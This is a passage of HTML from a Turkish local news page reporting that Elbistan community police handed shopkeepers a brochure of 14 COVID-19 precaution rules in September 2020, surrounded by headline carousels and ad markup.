href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div class="span12 reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/fuzulev_gif_980.gif" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" /></a></div> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/ne-canimiz-yansin-ne-de-cebimiz-h67758.html" title="Ne canımız yansın ne de cebimiz!" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/09/Ysimsiz-1_20.jpg" alt="Ne canımız yansın ne de cebimiz!" class="pull-left" /> <div class="caption-line"><p>Ne canımız yansın ne de...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-keske-yapmasaydim-dememek-icin-tedbiri-elden-birakmayin-h67749.html" title="Kaymakam Demir: “’Keşke yapmasaydım’ dememek için tedbiri elden bırakmayın”" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/09/Ysimsiz-1_19.jpg" alt="Kaymakam Demir: “’Keşke yapmasaydım’ dememek için tedbiri elden bırakmayın”" class="pull-left" /> <div class="caption-line"><p>Kaymakam Demir: “’Keşke yapmasaydım’ dememek...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/ilkogretim-haftasi-kutlaniyor-h67747.html" title="İlköğretim Haftası kutlanıyor" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/09/Ysimsiz-1_18.jpg" alt="İlköğretim Haftası kutlanıyor" class="pull-left" /> <div class="caption-line"><p>İlköğretim Haftası kutlanıyor</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/dumani-hem-boguyor-hem-zehirliyor-kokusu-da-cabasi-h67733.html" title="Dumanı hem boğuyor hem zehirliyor, kokusu da cabası!" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/09/Ysimsiz-1_17.jpg" alt="Dumanı hem boğuyor hem zehirliyor, kokusu da cabası!" class="pull-left" /> <div class="caption-line"><p>Dumanı hem boğuyor hem zehirliyor,...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/bilindik-bahaneler-900-lira-cezadan-kurtaramadi-h67726.html" title="Bilindik bahaneler 900 lira cezadan kurtaramadı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/09/Ysimsiz-1_16.jpg" alt="Bilindik bahaneler 900 lira cezadan kurtaramadı" class="pull-left" /> <div class="caption-line"><p>Bilindik bahaneler 900 lira cezadan...</p></div> </a> </li> </ul> </div> </div> <div class="span12 reklam reklam109"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- kaynarca --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3633419220222736" data-ad-slot="5807534991" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">TDP ekipleri esnaflara 14 kural broşürü dağıttı</h1> <h2 class="lead" itemprop="description"><strong>Elbistan’da Toplum Destekli Polislik (TDP) Büro Amirliği görevlileri, ilçedeki esnaflar ve vatandaşlarla Suriyeli mülteticilere, maske ve sosyal mesafeye uyalım projesi kapsamında koronavirüs salgınına karşı uyulması gereken 14 kuralın yer aldığı broşür dağıttı.</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2020-09-15 17:45:19" content="2020-09-15T17:45:19+02:00">15 Eylül 2020 Salı 17:45</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/tdp_ekipleri_esnaflara_14_kural_brosuru_dagitti_h67760_35c14.jpg" alt="TDP ekipleri esnaflara 14 kural broşürü dağıttı" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/guncel/tdp-ekipleri-esnaflara-14-kural-brosuru-dagitti-h67760.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><a href="http://www.elbistaninsesi.com/banner.php?id=17" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/gocbal1_2.gif" width="336" height="280" style="width:336px;height: 280px;border:0" alt="banner17" /></a></div> <div class="reklam reklam135 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=43" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/kardelen600._1.gif" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner43" /></a></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNormal" style="text-indent:7.1pt;tab-stops:10.0cm"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">TDP görevlileri,  özellikle maske, sosyal mesafe ve temizlik kurallarına uyulması konusunda uyarıda bulundu.</span></span><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,sans-serif"><p></p></span></p> <p class="MsoNormal" style="text-indent:7.1pt;tab-stops:10.0cm"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Elbistan İlçe Emniyet Müdürlüğü Toplum Destekli Polislik (TDP) Büro Amirliği görevlileri, koronavirüs (Kovid-19) tedbirleri kapsamında esnaflara salgına karşı alınan tedbirleri hatırlattı. Toplum Destekli Polislik Büro Amirliği ekipleri bu kapsamda cadde ve sokaklarda esnaf ve vatandaşlara uyarılarda bulundu. Pandemiye karşı maske takma zorunluluğunu bulunduğunu anlatan TDP görevlileri, esnaflara maskesiz alışverişe gelen vatandaşları içeri almamaları gerektiğini vurguladı.</span></span><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,sans-serif"><p></p></span></p> <p class="MsoNormal" style="text-indent:7.1pt;tab-stops:10.0cm"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Koronavirüs ile mücadelenin anlatıldığı 14 kural broşürleri, ilçedeki Suriyeli esnaflara da dağıtan Toplum Destekli Polislik (TDP) Büro Amirliği görevlileri, pandemi sürecinde alınan tedbirlere harfiyen uyulmasının önemine de vurgu yaptı.<br/><br/><br/><img src="/images/upload/001(2496).jpg" width="640" height="355" alt=""></img><img src="/images/upload/002(2680).jpg" width="640" height="462" alt=""></img><img src="/images/upload/003(2186).jpg" width="640" height="450" alt=""></img></span></span><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,sans-serif"> <p></p></span></p></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ne-canimiz-yansin-ne-de-cebimiz-h67758.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/salginin-elbistandaki-durumu-masaya-yatirildi-h67759.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/sehitler-ve-gaziler-derneginden-mhpye-hayirli-olsun-ziyareti-h67761.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/tdp-ekipleri-esnaflara-14-kural-brosuru-dagitti-h67760.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/papatyam-anaokuluna-tseden-onayli-okulum-temiz-belgesi-h67757.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/emyoda-3d-yazici-ile-uretilen-siperlikler-teslim-edildi-h67756.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/doga-ve-hayvanlari-koruma-polisinden-yarali-sahine-yardim-eli-h67755.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demir-keske-yapmasaydim-dememek-icin-tedbiri-elden-birakmayin-h67749.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-kedi-parki-projesini-hayata-gecirdi-h67748.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ilkogretim-haftasi-kutlaniyor-h67747.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/gelecek-partisinin-yeni-baskani-kursat-yuksel-oldu-h67744.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobiller-carpisti-2-yarali-h67743.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/drift-atip-kacan-surucuye-6-bin-500-tl-ceza-h67740.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kamyonetle-pat-pat-carpisti-1-yarali-h67739.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/garajdaki-yangin-otomobili-kul-etti-h67738.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/dumani-hem-boguyor-hem-zehirliyor-kokusu-da-cabasi-h67733.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-tapu-muduru-ramazan-satici-oldu-h67732.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/sehirlerarasi-yolculukta-hes-kodu-olmadan-bilet-satilmayacak-h67731.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/genclik-merkezi-nde-eba-erisim-noktasi-olusturuldu-h67730.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/cenk-tosundan-elbistanlilara-mesaj-var-h67729.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ucan-catidan-dusen-taslar-babaanne-ve-torununu-yaraladi-h67728.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/suphe-uzerine-durdurulan-otomobilden-silah-ve-uyusturucu-hap-cikti-h67727.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bilindik-bahaneler-900-lira-cezadan-kurtaramadi-h67726.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/narkotikten-uyusturucu-operasyonu-1-tutuklama-h67725.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/cerezlik-ay-cekirdeginde-yuksek-verim-sevinci-h67719.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/ne-canimiz-yansin-ne-de-cebimiz-h67758.html" title="Ne canımız yansın ne de cebimiz!"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/ne_canimiz_yansin_ne_de_cebimiz_h67758_85f3a.jpg" alt="Ne canımız yansın ne de cebimiz!" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ne canımız yansın ne de cebimiz!</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/salginin-elbistandaki-durumu-masaya-yatirildi-h67759.html" title="Salgının Elbistan’daki durumu masaya yatırıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/salginin_elbistandaki_durumu_masaya_yatirildi_h67759_2c00a.jpg" alt="Salgının Elbistan’daki durumu masaya yatırıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Salgının Elbistan’daki durumu masaya yatırıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/sehitler-ve-gaziler-derneginden-mhpye-hayirli-olsun-ziyareti-h67761.html" title="Şehitler ve Gaziler Derneği’nden MHP’ye hayırlı olsun ziyareti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/sehitler_ve_gaziler_derneginden_mhpye_hayirli_olsun_ziyareti_h67761_366b5.jpg" alt="Şehitler ve Gaziler Derneği’nden MHP’ye hayırlı olsun ziyareti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Şehitler ve Gaziler Derneği’nden MHP’ye hayırlı olsun ziyareti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/tdp-ekipleri-esnaflara-14-kural-brosuru-dagitti-h67760.html" title="TDP ekipleri esnaflara 14 kural broşürü dağıttı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/tdp_ekipleri_esnaflara_14_kural_brosuru_dagitti_h67760_35c14.jpg" alt="TDP ekipleri esnaflara 14 kural broşürü dağıttı" /> <div class="carousel-caption"> <h2> <span style="font-size:">TDP ekipleri esnaflara 14 kural broşürü dağıttı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/papatyam-anaokuluna-tseden-onayli-okulum-temiz-belgesi-h67757.html" title="Papatyam Anaokulu’na TSE’den onaylı ‘Okulum Temiz’ belgesi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/papatyam_anaokuluna_tseden_onayli_okulum_temiz_belgesi_h67757_ff454.jpg" alt="Papatyam Anaokulu’na TSE’den onaylı ‘Okulum Temiz’ belgesi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Papatyam Anaokulu’na TSE’den onaylı ‘Okulum Temiz’ belgesi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/emyoda-3d-yazici-ile-uretilen-siperlikler-teslim-edildi-h67756.html" title="EMYO’da 3D yazıcı ile üretilen siperlikler teslim edildi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/emyoda_3d_yazici_ile_uretilen_siperlikler_teslim_edildi_h67756_68ceb.jpg" alt="EMYO’da 3D yazıcı ile üretilen siperlikler teslim edildi" /> <div class="carousel-caption"> <h2> <span style="font-size:">EMYO’da 3D yazıcı ile üretilen siperlikler teslim edildi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/doga-ve-hayvanlari-koruma-polisinden-yarali-sahine-yardim-eli-h67755.html" title="Doğa ve Hayvanları Koruma Polisi’nden yaralı şahine yardım eli"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/doga_ve_hayvanlari_koruma_polisinden_yarali_sahine_yardim_eli_h67755_2b366.jpg" alt="Doğa ve Hayvanları Koruma Polisi’nden yaralı şahine yardım eli" /> <div class="carousel-caption"> <h2> <span style="font-size:">Doğa ve Hayvanları Koruma Polisi’nden yaralı şahine yardım eli</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-keske-yapmasaydim-dememek-icin-tedbiri-elden-birakmayin-h67749.html" title="Kaymakam Demir: “’Keşke yapmasaydım’ dememek için tedbiri elden bırakmayın”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/kaymakam_demir_keske_yapmasaydim_dememek_icin_tedbiri_elden_birakmayin_h67749_af449.jpg" alt="Kaymakam Demir: “’Keşke yapmasaydım’ dememek için tedbiri elden bırakmayın”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Demir: “’Keşke yapmasaydım’ dememek için tedbiri elden bırakmayın”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-kedi-parki-projesini-hayata-gecirdi-h67748.html" title="Elbistan Belediyesi, ‘kedi parkı’ projesini hayata geçirdi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/elbistan_belediyesi_kedi_parki_projesini_hayata_gecirdi_h67748_ba423.jpg" alt="Elbistan Belediyesi, ‘kedi parkı’ projesini hayata geçirdi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Belediyesi, ‘kedi parkı’ projesini hayata geçirdi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ilkogretim-haftasi-kutlaniyor-h67747.html" title="İlköğretim Haftası kutlanıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/ilkogretim_haftasi_kutlaniyor_h67747_62c71.jpg" alt="İlköğretim Haftası kutlanıyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">İlköğretim Haftası kutlanıyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/gelecek-partisinin-yeni-baskani-kursat-yuksel-oldu-h67744.html" title="Gelecek Partisi’nin yeni başkanı Kürşat Yüksel oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/gelecek_partisinin_yeni_baskani_kursat_yuksel_oldu_h67744_247f1.jpg" alt="Gelecek Partisi’nin yeni başkanı Kürşat Yüksel oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Gelecek Partisi’nin yeni başkanı Kürşat Yüksel oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/otomobiller-carpisti-2-yarali-h67743.html" title="Otomobiller çarpıştı: 2 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/otomobiller_carpisti_2_yarali_h67743_4c7ce.jpg" alt="Otomobiller çarpıştı: 2 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Otomobiller çarpıştı: 2 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/drift-atip-kacan-surucuye-6-bin-500-tl-ceza-h67740.html" title="‘Drift’ atıp kaçan sürücüye 6 bin 500 TL ceza"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/drift_atip_kacan_surucuye_6_bin_500_tl_ceza_h67740_59066.jpg" alt="‘Drift’ atıp kaçan sürücüye 6 bin 500 TL ceza" /> <div class="carousel-caption"> <h2> <span style="font-size:">‘Drift’ atıp kaçan sürücüye 6 bin 500 TL ceza</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kamyonetle-pat-pat-carpisti-1-yarali-h67739.html" title="Kamyonetle pat-pat çarpıştı: 1 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/kamyonetle_pat_pat_carpisti_1_yarali_h67739_8f665.JPG" alt="Kamyonetle pat-pat çarpıştı: 1 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kamyonetle pat-pat çarpıştı: 1 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/garajdaki-yangin-otomobili-kul-etti-h67738.html" title="Garajdaki yangın otomobili kül etti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/garajdaki_yangin_otomobili_kul_etti_h67738_cb78a.jpg" alt="Garajdaki yangın otomobili kül etti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Garajdaki yangın otomobili kül etti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/dumani-hem-boguyor-hem-zehirliyor-kokusu-da-cabasi-h67733.html" title="Dumanı hem boğuyor hem zehirliyor, kokusu da cabası!"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/dumani_hem_boguyor_hem_zehirliyor_kokusu_da_cabasi_oluyor_h67733_92048.jpg" alt="Dumanı hem boğuyor hem zehirliyor, kokusu da cabası!" /> <div class="carousel-caption"> <h2> <span style="font-size:">Dumanı hem boğuyor hem zehirliyor, kokusu da cabası!</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-tapu-muduru-ramazan-satici-oldu-h67732.html" title="Elbistan Tapu Müdürü Ramazan Satıcı oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/elbistan_tapu_muduru_ramazan_satici_oldu_h67732_befd7.jpg" alt="Elbistan Tapu Müdürü Ramazan Satıcı oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Tapu Müdürü Ramazan Satıcı oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/sehirlerarasi-yolculukta-hes-kodu-olmadan-bilet-satilmayacak-h67731.html" title="Şehirlerarası yolculukta HES kodu olmadan bilet satılmayacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/sehirlerarasi_yolculukta_hes_kodu_olmadan_bilet_satilmayacak_h67731_f8ad4.jpg" alt="Şehirlerarası yolculukta HES kodu olmadan bilet satılmayacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">Şehirlerarası yolculukta HES kodu olmadan bilet satılmayacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/genclik-merkezi-nde-eba-erisim-noktasi-olusturuldu-h67730.html" title="Gençlik Merkezi&#039;nde EBA erişim noktası oluşturuldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/genclik_merkezi_nde_eba_erisim_noktasi_olusturuldu_h67730_570da.jpg" alt="Gençlik Merkezi&#039;nde EBA erişim noktası oluşturuldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Gençlik Merkezi&#039;nde EBA erişim noktası oluşturuldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/cenk-tosundan-elbistanlilara-mesaj-var-h67729.html" title="Cenk Tosun’dan Elbistanlılara mesaj var"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/cenk_tosundan_elbistanlilara_mesaj_var_h67729_b4b23.jpg" alt="Cenk Tosun’dan Elbistanlılara mesaj var" /> <div class="carousel-caption"> <h2> <span style="font-size:">Cenk Tosun’dan Elbistanlılara mesaj var</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ucan-catidan-dusen-taslar-babaanne-ve-torununu-yaraladi-h67728.html" title="Uçan çatıdan düşen taşlar babaanne ve torununu yaraladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/ucan_catidan_dusen_taslar_babaanne_ve_torununu_yaraladi_h67728_8a8a2.jpg" alt="Uçan çatıdan düşen taşlar babaanne ve torununu yaraladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Uçan çatıdan düşen taşlar babaanne ve torununu yaraladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/suphe-uzerine-durdurulan-otomobilden-silah-ve-uyusturucu-hap-cikti-h67727.html" title="Şüphe üzerine durdurulan otomobilden silah ve uyuşturucu hap çıktı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/suphe_uzerine_durdurulan_otomobilden_silah_ve_uyusturucu_hap_cikti_h67727_a4b4e.jpg" alt="Şüphe üzerine durdurulan otomobilden silah ve uyuşturucu hap çıktı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Şüphe üzerine durdurulan otomobilden silah ve uyuşturucu hap çıktı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bilindik-bahaneler-900-lira-cezadan-kurtaramadi-h67726.html" title="Bilindik bahaneler 900 lira cezadan kurtaramadı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/bilindik_bahaneler_900_lira_cezadan_kurtaramadi_h67726_4ef37.jpg" alt="Bilindik bahaneler 900 lira cezadan kurtaramadı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Bilindik bahaneler 900 lira cezadan kurtaramadı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/narkotikten-uyusturucu-operasyonu-1-tutuklama-h67725.html" title="Narkotik’ten uyuşturucu operasyonu: 1 tutuklama"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/narkotikten_uyusturucu_operasyonu_1_tutuklama_h67725_573c8.jpg" alt="Narkotik’ten uyuşturucu operasyonu: 1 tutuklama" /> <div class="carousel-caption"> <h2> <span style="font-size:">Narkotik’ten uyuşturucu operasyonu: 1 tutuklama</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/cerezlik-ay-cekirdeginde-yuksek-verim-sevinci-h67719.html" title="Çerezlik ay çekirdeğinde yüksek verim sevinci"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/09/cerezlik_ay_cekirdeginde_yuksek_verim_sevinci_h67719_18844.jpg" alt="Çerezlik ay çekirdeğinde yüksek verim sevinci" /> <div class="carousel-caption"> <h2> <span style="font-size:">Çerezlik ay çekirdeğinde yüksek verim sevinci</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div><a href="http://www.elbistaninsesi.com/haberleri/TDP+ekipleri+esnaflara+14+kural+bro%C5%9F%C3%BCr%C3%BC+da%C4%9F%C4%B1tt%C4%B1" title="TDP Ekipleri Esnaflara 14 Kural Broşürü Dağıttı haberleri">TDP Ekipleri 